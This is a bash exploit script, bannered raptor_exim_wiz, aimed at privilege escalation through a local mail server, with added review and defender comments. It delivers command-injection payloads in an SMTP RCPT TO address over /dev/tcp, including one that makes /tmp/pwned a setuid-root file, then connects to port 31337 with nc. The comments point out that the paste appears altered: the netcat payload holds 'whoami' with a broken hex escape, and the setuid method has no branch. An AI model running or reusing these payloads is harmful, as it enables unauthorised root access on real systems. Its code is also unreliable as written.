- #!/bin/bash
- METHOD="setuid" # default method; replaced by whatever value follows -m on the command line
- PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost' # recipient-address string: a ${run{...}} expansion (presumably Exim syntax, going by the banner) with hex-escaped characters that requests chown root + chmod 4755 on /tmp/pwned; never referenced again in this paste. Defender note: a "${run{" substring in an SMTP recipient and a setuid-root /tmp/pwned are the artifacts to alert on
- PAYLOAD_NETCAT='${run{\x2whoami\x22}}@localhost' # NOTE(review): despite the name this holds "whoami", and the escape \x2 is followed by a non-hex character; the paste appears altered or truncated
- # usage: print the command-line help to stdout and terminate the script with status 1; takes no arguments
- function usage()
- {
- echo "$0 [-m METHOD]" # $0 is the name the script was invoked as
- echo "-m setuid : use the setuid payload (default)" # NOTE(review): the dispatch code at the bottom of this paste has no setuid branch
- echo "-m netcat : use the netcat payload"
- exit 1 # exits the whole script, so callers never regain control
- }
- # payload delivery: hold one SMTP session with the mail server on localhost:25 and submit the global $PAYLOAD as the recipient address; takes no arguments and prints every server reply to stdout
- function exploit()
- {
- # open file descriptor 3 read/write on a TCP connection to localhost port 25 (bash /dev/tcp redirection)
- exec 3<>/dev/tcp/localhost/25
- # SMTP dialogue: each read takes one reply line from fd 3 into REPLY and echoes it; replies are displayed only, never checked for an error code
- read -u 3 && echo $REPLY # first line sent by the server (its greeting)
- echo "helo localhost" >&3
- read -u 3 && echo $REPLY
- echo "mail from:<>" >&3 # empty envelope sender
- read -u 3 && echo $REPLY
- echo "rcpt to:<$PAYLOAD>" >&3 # the only place $PAYLOAD is used; defender note: this RCPT TO value is what shows up in the mail server's logs
- read -u 3 && echo $REPLY
- echo "data" >&3
- read -u 3 && echo $REPLY
- for i in {1..31} # message content is 31 numbered "Received:" lines and nothing else; the page does not explain the count
- do
- echo "Received: $i" >&3
- done
- echo "." >&3 # a lone dot ends the DATA section
- read -u 3 && echo $REPLY
- echo "quit" >&3
- read -u 3 && echo $REPLY # fd 3 is not closed explicitly after this
- }
- # print banner (tool name and author credit)
- echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
- echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
- # parse command line: only "-m METHOD" is accepted; any other argument prints usage and exits
- while [ ! -z "$1" ]; do
- case $1 in
- -m) shift; METHOD="$1"; shift;; # METHOD becomes whatever follows -m; the value is not validated here
- * ) usage
- ;;
- esac
- done
- if [ -z $METHOD ]; then # NOTE(review): $METHOD is unquoted here and in the comparison below, so a value containing spaces breaks the test
- usage
- fi
- if [ $METHOD = "netcat" ]; then # "netcat" is the only method handled in this paste
- # select the netcat payload string and run the SMTP session
- echo "Delivering $METHOD payload..."
- PAYLOAD=$PAYLOAD_NETCAT
- exploit
- # pause 5 seconds, then connect to 127.0.0.1 port 31337 with nc; defender note: a local connection to that port is another observable of this script
- echo "Waiting 5 seconds..."
- sleep 5
- nc -v 127.0.0.1 31337
- # any other METHOD value, including the default "setuid", ends in usage
- else
- usage
- fi